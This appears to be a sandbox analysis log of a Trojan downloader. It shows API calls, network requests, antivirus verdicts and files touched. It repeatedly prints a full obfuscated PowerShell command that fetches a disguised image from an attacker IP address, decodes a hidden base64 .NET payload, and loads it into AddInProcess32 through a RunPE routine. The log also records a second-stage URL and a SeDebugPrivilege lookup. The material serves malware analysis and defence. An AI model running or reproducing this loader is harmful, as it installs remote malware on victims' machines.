cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
filepath: powershell
1 1 0
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.VBS.SLoad.gen
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
ZoneAlarm HEUR:Trojan-Downloader.VBS.SLoad.gen
Varist VBS/Agent.BNM!Eldorado
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received žžDŠ^àÍ× *»¥Ùµ'Ò8DŽˆÆ·­û^UÕ]H,^œ`&û!ŠäSgŽõ«kÝ&iN –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 91.92.254.14
host 91.92.254.194
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0

send

buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1416
sent: 83
1 83 0
parent_process wscript.exe martian_process powershell -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe